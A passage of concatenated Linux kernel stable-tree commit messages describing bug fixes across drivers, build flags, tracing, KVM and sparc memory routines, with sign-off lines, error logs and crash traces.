Fixes: ba7f4f557e ("clk: imx: correct AV PLL rate formula")
Cc: Anson Huang <b20788@freescale.com>
Signed-off-by: Emil Lundmark <emil@limesaudio.com>
Reviewed-by: Fabio Estevam <fabio.estevam@nxp.com>
Acked-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f3358507c1 upstream.
Virtio 1.0 spec says VIRTIO_F_ANY_LAYOUT and VIRTIO_NET_F_GSO are
legacy-only feature bits. Do not negotiate them in virtio 1 mode. Note
this is a spec violation so we need to backport it to stable/downstream
kernels.
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Reviewed-by: Cornelia Huck <cornelia.huck@de.ibm.com>
Acked-by: Jason Wang <jasowang@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bc9db5ad32 upstream.
My heuristic for detecting type 1 DVI DP++ adaptors based on the VBT
port information apparently didn't survive the reality of buggy VBTs.
In this particular case we have a machine with a natice HDMI port, but
the VBT tells us it's a DP++ port based on its capabilities.
The dvo_port information in VBT does claim that we're dealing with a
HDMI port though, but we have other machines which do the same even
when they actually have DP++ ports. So that piece of information alone
isn't sufficient to tell the two apart.
After staring at a bunch of VBTs from various machines, I have to
conclude that the only other semi-reliable clue we can use is the
presence of the AUX channel in the VBT. On this particular machine
AUX channel is specified as zero, whereas on some of the other machines
which listed the DP++ port as HDMI have a non-zero AUX channel.
I've also seen VBTs which have dvo_port a DP but have a zero AUX
channel. I believe those we need to treat as DP ports, so we'll limit
the AUX channel check to just the cases where dvo_port is HDMI.
If we encounter any more serious failures with this heuristic I think
we'll have to have to throw it out entirely. But that could mean that
there is a risk of type 1 DVI dongle users getting greeted by a
black screen, so I'd rather not go there unless absolutely necessary.
v2: Remove the duplicate PORT_A check (Daniel)
Fix some typos in the commit message
Cc: Daniel Otero <daniel.otero@outlook.com>
Tested-by: Daniel Otero <daniel.otero@outlook.com>
Fixes: d61992565b ("drm/i915: Determine DP++ type 1 DVI adaptor presence based on VBT")
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97994
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1478884464-14251-1-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Daniel Vetter <daniel.vetter@ffwll.ch>
(cherry picked from commit 7a17995a3d)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8e94a46c17 upstream.
External clients which import our bo's wait only
for exclusive dmabuf-fences, not on shared ones,
ditto for bo's which we import from external
providers and write to.
Therefore attach exclusive fences on prime shared buffers
if our exported buffer gets imported by an external
client, or if we import a buffer from an external
exporter.
See discussion in thread:
https://lists.freedesktop.org/archives/dri-devel/2016-October/122370.html
Prime export tested on Intel iGPU + AMD Tonga dGPU as
DRI3/Present Prime render offload, and with the Tonga
standalone as primary gpu.
v2: Add a wait for all shared fences before prime export,
as suggested by Christian Koenig.
v3: - Mark buffer prime_exported in amdgpu_gem_prime_pin,
so we only use the exclusive fence when exporting a
bo to external clients like a separate iGPU, but not
when exporting/importing from/to ourselves as part of
regular DRI3 fd passing.
- Propagate failure of reservation_object_wait_rcu back
to caller.
v4: - Switch to a prime_shared_count counter instead of a
flag, which gets in/decremented on prime_pin/unpin, so
we can switch back to shared fences if all clients
detach from our exported bo.
- Also switch to exclusive fence for prime imported bo's.
v5: - Drop lret, instead use int ret -> long ret, as proposed
by Christian.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=95472
Tested-by: Mike Lothian <mike@fireburn.co.uk> (v1)
Signed-off-by: Mario Kleiner <mario.kleiner.de@gmail.com>
Reviewed-by: Christian König <christian.koenig@amd.com>.
Cc: Christian König <christian.koenig@amd.com>
Cc: Michel Dänzer <michel.daenzer@amd.com>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c0a3601363 upstream.
Commit d3cbff1b5 "powerpc: Put exception configuration in a common place"
broke the setting of the AIL bit (which enables taking exceptions with
the MMU still on) on all processors, moving it incorrectly to a function
called only on the boot CPU. This was correct for the guest case but
not when running in hypervisor mode.
This fixes it by partially reverting that commit, putting the setting
back in cpu_ready_for_interrupts()
Fixes: d3cbff1b5a ("powerpc: Put exception configuration in a common place")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 83d2c9a9c1 upstream.
When using AES-XTS on a Wandboard, we receive a Mode error:
caam_jr 2102000.jr1: 20001311: CCB: desc idx 19: AES: Mode error.
According to the Security Reference Manual, the Low Power AES units
of the i.MX6 do not support the XTS mode. Therefore we must not
register XTS implementations in the Crypto API.
Signed-off-by: Sven Ebenfeld <sven.ebenfeld@gmail.com>
Reviewed-by: Horia Geantă <horia.geanta@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Fixes: c6415a6016 "crypto: caam - add support for acipher xts(aes)"
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
commit e3c9d9d6eb upstream.
Since commit fa93fd4ecc ("regulator: core: Ensure we are at least in
bounds for our constraints") the imx53-qsb board populated with a Dialog
DA9053 PMIC fails to boot:
LDO3: Bringing 3300000uV into 1800000-1800000uV
The LDO3 voltage constraints passed in the device tree do not match
the valid range according to the datasheet, so fix this accordingly to
allow the board booting again.
While at it, fix the other voltage constraints as well.
Signed-off-by: Fabio Estevam <fabio.estevam@nxp.com>
Signed-off-by: Shawn Guo <shawnguo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c6a3855391 upstream.
So Sebastian turned off the PIE for kernel builds but that was too late
- Kbuild.include already uses KBUILD_CFLAGS and trying to disable gcc
options with, say cc-disable-warning, fails:
gcc -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs
...
-Wno-sign-compare -fno-asynchronous-unwind-tables -Wframe-address -c -x c /dev/null -o .31392.tmp
/dev/null:1:0: error: code model kernel does not support PIC mode
because that returns an error and we can't disable the warning. For
example in this case:
KBUILD_CFLAGS += $(call cc-disable-warning,frame-address,)
which leads to gcc issuing all those warnings again.
So let's turn off PIE/PIC at the earliest possible moment, when we
declare KBUILD_CFLAGS so that cc-disable-warning picks it up too.
Also, we need the $(call cc-option ...) because -fno-PIE is supported
since gcc v3.4 and our lowest supported gcc version is 3.2 right now.
Signed-off-by: Borislav Petkov <bp@suse.de>
Cc: Ben Hutchings <ben@decadent.org.uk>
Cc: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 90944e40ba upstream.
If the gcc is configured to do -fPIE by default then the build aborts
later with:
| Unsupported relocation type: unknown type rel type name (29)
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 82031ea29e upstream.
Adding -no-PIE to the fstack protector check. -no-PIE was introduced
before -fstack-protector so there is no need for a runtime check.
Without it the build stops:
|Cannot use CONFIG_CC_STACKPROTECTOR_STRONG: -fstack-protector-strong available but compiler is broken
due to -mcmodel=kernel + -fPIE if -fPIE is enabled by default.
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ae94224c9 upstream.
Debian started to build the gcc with -fPIE by default so the kernel
build ends before it starts properly with:
|kernel/bounds.c:1:0: error: code model kernel does not support PIC mode
Also add to KBUILD_AFLAGS due to:
|gcc -Wp,-MD,arch/x86/entry/vdso/vdso32/.note.o.d … -mfentry -DCC_USING_FENTRY … vdso/vdso32/note.S
|arch/x86/entry/vdso/vdso32/note.S:1:0: sorry, unimplemented: -mfentry isn’t supported for 32-bit in combination with -fpic
Tagging it stable so it is possible to compile recent stable kernels as
well.
Signed-off-by: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
Signed-off-by: Michal Marek <mmarek@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ef6000b4c6 upstream.
This affectively reverts commit 377ccbb483 ("Makefile: Mute warning
for __builtin_return_address(>0) for tracing only") because it turns out
that it really isn't tracing only - it's all over the tree.
We already also had the warning disabled separately for mm/usercopy.c
(which this commit also removes), and it turns out that we will also
want to disable it for get_lock_parent_ip(), that is used for at least
TRACE_IRQFLAGS. Which (when enabled) ends up being all over the tree.
Steven Rostedt had a patch that tried to limit it to just the config
options that actually triggered this, but quite frankly, the extra
complexity and abstraction just isn't worth it. We have never actually
had a case where the warning is actually useful, so let's just disable
it globally and not worry about it.
Acked-by: Steven Rostedt <rostedt@goodmis.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Ingo Molnar <mingo@kernel.org>
Cc: Peter Anvin <hpa@zytor.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ad092de60f upstream.
Deselect functionality can be ignored for device-trees with
"i2c-mux-idle-disconnect" entries if no platform_data is available.
By enabling the deselect functionality outside the platform_data
block the logic works as it did in previous kernels.
Fixes: 7fcac98071 ("i2c: i2c-mux-pca954x: convert to use an explicit i2c mux core")
Signed-off-by: Alex Hemme <ahemme@cisco.com>
Signed-off-by: Ziyang Wu <ziywu@cisco.com>
[touched up a few minor issues /peda]
Signed-off-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 93d710a65e upstream.
We get the following build error from UM Linux after adding
an entry to drivers/iio/gyro/Kconfig that issues "select I2C_MUX":
ERROR: "devm_ioremap_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
ERROR: "of_address_to_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
It appears that the I2C mux core code depends on HAS_IOMEM
for historical reasons, while CONFIG_I2C_MUX_REG does *not*
have a direct dependency on HAS_IOMEM.
This creates a situation where a allyesconfig or allmodconfig
for UM Linux will select I2C_MUX, and will implicitly enable
I2C_MUX_REG as well, and the compilation will fail for the
register driver.
Fix this up by making I2C_MUX_REG depend on HAS_IOMEM and
removing the dependency from I2C_MUX.
Reported-by: kbuild test robot <fengguang.wu@intel.com>
Reported-by: Jonathan Cameron <jic23@jic23.retrosnub.co.uk>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Jonathan Cameron <jic23@kernel.org>
Acked-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a2541910d upstream.
The commit [1a3f099101: ALSA: hda - Fix surround output pins for
ASRock B150M mobo] introduced a fixup of pin configs for ASRock
mobos to fix the surround outputs. However, this overrides the pin
configs of the mic pins as if they are outputs-only, effectively
disabling the mic inputs. Of course, it's a regression wrt mic
functionality.
Actually the pins 0x18 and 0x1a don't need to be changed; we just need
to disable the bogus pins 0x14 and 0x15. Then the auto-parser will
pick up mic pins as switchable and assign the surround outputs there.
This patch removes the incorrect pin overrides of NID 0x18 and 0x1a
from the ASRock fixup.
Fixes: 1a3f099101 ('ALSA: hda - Fix surround output pins for ASRock...')
Reported-and-tested-by: Vitor Antunes <vitor.hda@gmail.com>
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=187431
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2ecb704a12 upstream.
Latest Thinkpad laptops use the HKEY_HID LEN0268 instead of the
LEN0068, as a result neither audio mute led nor mic mute led can work
any more.
After adding the new HKEY_HID into the is_thinkpad(), both of them
works well as before.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ff1a25318 upstream.
The usb-audio driver implements the deferred device disconnection for
the device in use. In this mode, the disconnection callback returns
immediately while the actual ALSA card object removal happens later
when all files get closed. As Shuah reported, this code flow,
however, leads to a use-after-free, detected by KASAN:
BUG: KASAN: use-after-free in snd_usb_audio_free+0x134/0x160 [snd_usb_audio] at addr ffff8801c863ce10
Write of size 8 by task pulseaudio/2244
Call Trace:
[<ffffffff81b31473>] dump_stack+0x67/0x94
[<ffffffff81564ef1>] kasan_object_err+0x21/0x70
[<ffffffff8156518a>] kasan_report_error+0x1fa/0x4e0
[<ffffffff81564ad7>] ? kasan_slab_free+0x87/0xb0
[<ffffffff81565733>] __asan_report_store8_noabort+0x43/0x50
[<ffffffffa0fc0f54>] ? snd_usb_audio_free+0x134/0x160 [snd_usb_audio]
[<ffffffffa0fc0f54>] snd_usb_audio_free+0x134/0x160 [snd_usb_audio]
[<ffffffffa0fc0fb1>] snd_usb_audio_dev_free+0x31/0x40 [snd_usb_audio]
[<ffffffff8243c78a>] __snd_device_free+0x12a/0x210
[<ffffffff8243d1f5>] snd_device_free_all+0x85/0xd0
[<ffffffff8242cae4>] release_card_device+0x34/0x130
[<ffffffff81ef1846>] device_release+0x76/0x1e0
[<ffffffff81b37ad7>] kobject_release+0x107/0x370
.....
Object at ffff8801c863cc80, in cache kmalloc-2048 size: 2048
Allocated:
[<ffffffff810804eb>] save_stack_trace+0x2b/0x50
[<ffffffff81564296>] save_stack+0x46/0xd0
[<ffffffff8156450d>] kasan_kmalloc+0xad/0xe0
[<ffffffff81560d1a>] kmem_cache_alloc_trace+0xfa/0x240
[<ffffffff8214ea47>] usb_alloc_dev+0x57/0xc90
[<ffffffff8216349d>] hub_event+0xf1d/0x35f0
....
Freed:
[<ffffffff810804eb>] save_stack_trace+0x2b/0x50
[<ffffffff81564296>] save_stack+0x46/0xd0
[<ffffffff81564ac1>] kasan_slab_free+0x71/0xb0
[<ffffffff81560929>] kfree+0xd9/0x280
[<ffffffff8214de6e>] usb_release_dev+0xde/0x110
[<ffffffff81ef1846>] device_release+0x76/0x1e0
....
It's the code trying to clear drvdata of the assigned usb_device where
the usb_device itself was already released in usb_release_dev() after
the disconnect callback.
This patch fixes it by checking whether the code path is via the
disconnect callback, i.e. chip->shutdown flag is set.
Fixes: 79289e2419 ('ALSA: usb-audio: Refer to chip->usb_id for quirks...')
Reported-and-tested-by: Shuah Khan <shuahkh@osg.samsung.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 60f8339eb3 upstream.
When locking a GPIO line as IRQ, we go to lengths to
double-check that the line is really set as input before
marking it as used for IRQ. This is not good on GPIO chips
that can sleep, because this function is called in IRQ-safe
context. Just skip this if it can't be checked quickly.
Currently this happens on sleeping expanders such as STMPE
or TC3589x:
BUG: scheduling while atomic: swapper/1/0x00000002
Modules linked in:
CPU: 0 PID: 1 Comm: swapper Not tainted 4.9.0-rc1+ #38
Hardware name: Nomadik STn8815
[<c000f2e0>] (unwind_backtrace) from [<c000d244>] (show_stack+0x10/0x14)
[<c000d244>] (show_stack) from [<c0037b78>] (__schedule_bug+0x54/0x80)
[<c0037b78>] (__schedule_bug) from [<c042df14>] (__schedule+0x3a0/0x460)
[<c042df14>] (__schedule) from [<c042e028>] (schedule+0x54/0xb8)
(...)
This patch fixes that problem and relies on the direction
read from the chip when it was added.
Fixes: 9c10280d85 ("gpio: flush direction status in gpiochip_lock_as_irq()")
Cc: Patrice Chotard <patrice.chotard@st.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f40584200b upstream.
Since commit c4dd1ba355
("mfd: stmpe: Add reset support for all STMPE variant")
we're resetting the STMPE expanders before use.
This caused a regression on the STMP2401 on the Nomadik
NHK8815:
stmpe-i2c 0-0043: stmpe2401 detected, chip id: 0x101
nmk-i2c 101f8000.i2c0: write to slave 0x43 timed out
nmk-i2c 101f8000.i2c0: no ack received after address transmission
stmpe-i2c 0-0044: stmpe2401 detected, chip id: 0x101
nmk-i2c 101f8000.i2c0: write to slave 0x44 timed out
nmk-i2c 101f8000.i2c0: no ack received after address transmission
It turns out that we start to poll for the reset bit to
go low again too quickly: the STMPE2401 is not yet online and
ready to be asked for the status of the RESET bit.
By introducing a 10ms delay before starting to hammer
the register for information, we get back to normal:
stmpe-i2c 0-0043: stmpe2401 detected, chip id: 0x101
stmpe-i2c 0-0044: stmpe2401 detected, chip id: 0x101
Cc: Amelie Delaunay <amelie.delaunay@st.com>
Fixes: c4dd1ba355 ("mfd: stmpe: Add reset support for all STMPE variant")
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Patrice Chotard <patrice.chotard@st.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 274e43edcd upstream.
Commit 41a3da2b8e ("mfd: intel-lpss: Save register context on
suspend") saved the register context while going to suspend and
also put the device in reset state.
Due to the resetting of device, system cannot enter S3/S0ix
states when no_console_suspend flag is enabled. The system
and serial console both hang. The resetting of device is not
needed while going to suspend. Hence remove this code.
Fixes: 41a3da2b8e ("mfd: intel-lpss: Save register context on suspend")
Signed-off-by: Azhar Shaikh <azhar.shaikh@intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1fafdcbe0 upstream.
The initial code for rdmavt carried with it a restriction that was a
vestige from the qib driver, that to dma map a page it had to be less
than a page size. This is not the case on modern hardware, both qib and
hfi1 will be just fine with unaligned map requests.
This fixes a 4.8 regression where by an IPoIB transfer of > PAGE_SIZE
will hang because the dma map page call always fails. This was
introduced after commit 5faba54695 ("IB/ipoib: Report SG feature
regardless of HW UD CSUM capability") added the capability to use SG by
default. Rather than override this, the HW supports it, so allow SG.
Reviewed-by: Mike Marciniszyn <mike.marciniszyn@intel.com>
Signed-off-by: Dennis Dalessandro <dennis.dalessandro@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 59c3b76cc6 upstream.
If pos is at the beginning of a page and copied is zero then page is not
zeroed but is marked uptodate.
Fix by skipping everything except unlock/put of page if zero bytes were
copied.
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes: 6b12c1b37e ("fuse: Implement write_begin/write_end callbacks")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ee7e87dfb upstream.
The type flags in the irq descriptor are there for historical reasons and
only updated via irq_modify_status() or irq_set_type(). Both functions also
update the type flags in irqdata. __setup_irq() is the only left over user
of the type flags in the irq descriptor.
If __setup_irq() is called with empty irq type flags, then the type flags
are retrieved from irqdata. If an interrupt is shared, then the type flags
are compared with the type flags stored in the irq descriptor.
On x86 the ioapic does not have a irq_set_type() callback because the type
is defined in the BIOS tables and cannot be changed. The type is stored in
irqdata at setup time without updating the type data in the irq
descriptor. As a result the comparison described above fails.
There is no point in updating the irq descriptor flags because the only
relevant storage is irqdata. Use the type flags from irqdata for both
retrieval and comparison in __setup_irq() instead.
Aside of that the print out in case of non matching type flags has the old
and new type flags arguments flipped. Fix that as well.
For correctness sake the flags stored in the irq descriptor should be
removed, but this is beyond the scope of this bugfix and will be done in a
later patch.
Fixes: 4b357daed6 ("genirq: Look-up trigger type if not specified by caller")
Reported-and-tested-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Marc Zyngier <marc.zyngier@arm.com>
Cc: Jon Hunter <jonathanh@nvidia.com>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1611072020360.3501@nanos
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 546fece4ea upstream.
When a module is first loaded and its function ip records are added to the
ftrace list of functions to modify, they are set to DISABLED, as their text
is still in a read only state. When the module is fully loaded, and can be
updated, the flag is cleared, and if their's any functions that should be
tracing them, it is updated at that moment.
But there's several locations that do record accounting and should ignore
records that are marked as disabled, or they can cause issues.
Alexei already fixed one location, but others need to be addressed.
Fixes: b7ffffbb46 "ftrace: Add infrastructure for delayed enabling of module functions"
Reported-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 977c1f9c8c upstream.
ftrace_shutdown() checks for sanity of ftrace records
and if dyn_ftrace->flags is not zero, it will warn.
It can happen that 'flags' are set to FTRACE_FL_DISABLED at this point,
since some module was loaded, but before ftrace_module_enable()
cleared the flags for this module.
In other words the module.c is doing:
ftrace_module_init(mod); // calls ftrace_update_code() that sets flags=FTRACE_FL_DISABLED
... // here ftrace_shutdown() is called that warns, since
err = prepare_coming_module(mod); // didn't have a chance to clear FTRACE_FL_DISABLED
Fix it by ignoring disabled records.
It's similar to what __ftrace_hash_rec_update() is already doing.
Link: http://lkml.kernel.org/r/1478560460-3818619-1-git-send-email-ast@fb.com
Fixes: b7ffffbb46 "ftrace: Add infrastructure for delayed enabling of module functions"
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b112c84a6f upstream.
KVM calls kvm_pmu_set_counter_event_type() when PMCCFILTR is configured.
But this function can't deals with PMCCFILTR correctly because the evtCount
bits of PMCCFILTR, which is reserved 0, conflits with the SW_INCR event
type of other PMXEVTYPER<n> registers. To fix it, when eventsel == 0, this
function shouldn't return immediately; instead it needs to check further
if select_idx is ARMV8_PMU_CYCLE_IDX.
Another issue is that KVM shouldn't copy the eventsel bits of PMCCFILTER
blindly to attr.config. Instead it ought to convert the request to the
"cpu cycle" event type (i.e. 0x11).
To support this patch and to prevent duplicated definitions, a limited
set of ARMv8 perf event types were relocated from perf_event.c to
asm/perf_event.h.
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Wei Huang <wei@redhat.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9e3f7a2969 upstream.
We're missing the handling code for the cycle counter accessed
from a 32bit guest, leading to unexpected results.
Signed-off-by: Wei Huang <wei@redhat.com>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1650b4ebc9 upstream.
Function user_notifier_unregister should be called only once for each
registered user notifier.
Function kvm_arch_hardware_disable can be executed from an IPI context
which could cause a race condition with a VCPU returning to user mode
and attempting to unregister the notifier.
Signed-off-by: Ignacio Alvarado <ikalvarado@google.com>
Fixes: 18863bdd60 ("KVM: x86 shared msr infrastructure")
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0b6e86846 upstream.
cpu_llc_id (Last Level Cache ID) derivation on AMD Fam17h has an
underflow bug when extracting the socket_id value. It starts from 0
so subtracting 1 from it will result in an invalid value. This breaks
scheduling topology later on since the cpu_llc_id will be incorrect.
For example, the the cpu_llc_id of the *other* CPU in the loops in
set_cpu_sibling_map() underflows and we're generating the funniest
thread_siblings masks and then when I run 8 threads of nbench, they get
spread around the LLC domains in a very strange pattern which doesn't
give you the normal scheduling spread one would expect for performance.
Other things like EDAC use cpu_llc_id so they will be b0rked too.
So, the APIC ID is preset in APICx020 for bits 3 and above: they contain
the core complex, node and socket IDs.
The LLC is at the core complex level so we can find a unique cpu_llc_id
by right shifting the APICID by 3 because then the least significant bit
will be the Core Complex ID.
Tested-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Yazen Ghannam <Yazen.Ghannam@amd.com>
[ Cleaned up and extended the commit message. ]
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Aravind Gopalakrishnan <aravindksg.lkml@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes: 3849e91f57 ("x86/AMD: Fix last level cache topology for AMD Fam17h systems")
Link: http://lkml.kernel.org/r/20161108083506.rvqb5h4chrcptj7d@pd.tnic
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0fd0ff01d4 ]
Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ee841d0aff ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e93704e446 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7ae3aaf53f ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9570770480 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit cb736fdbb2 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d0796b555b ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0096ac9f47 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 83a17d2661 ]
The fixup helper function mechanism for handling user copy fault
handling is not %100 accurrate, and can never be made so.
We are going to transition the code to return the running return
return length, which is always kept track in one or more registers
of each of these routines.
In order to convert them one by one, we have to allow the existing
behavior to continue functioning.
Therefore make all the copy code that wants the fixup helper to be
used return negative one.
After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a74ad5e660 ]
When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.
When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.
We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.
Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.
First of all we use an (mostly arbitrary) cut-off of 256K which is
about 32 pages. This can be tuned in the future.
The huge range code path for each chip works as follows:
1) On spitfire we flush all non-locked TLB entries using diagnostic
acceses.
2) On cheetah we use the "flush all" TLB flush.
3) On sun4v/hypervisor we do a TLB context flush on context 0, which
unlike previous chips does not remove "permanent" or locked
entries.
We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.
Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a236441bb6 ]
Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b429ae4d5b ]
When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.
Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.
Use an absolute jmpl to fix this problem.
Signed-off-by: David S. Miller <davem@davemloft.net>
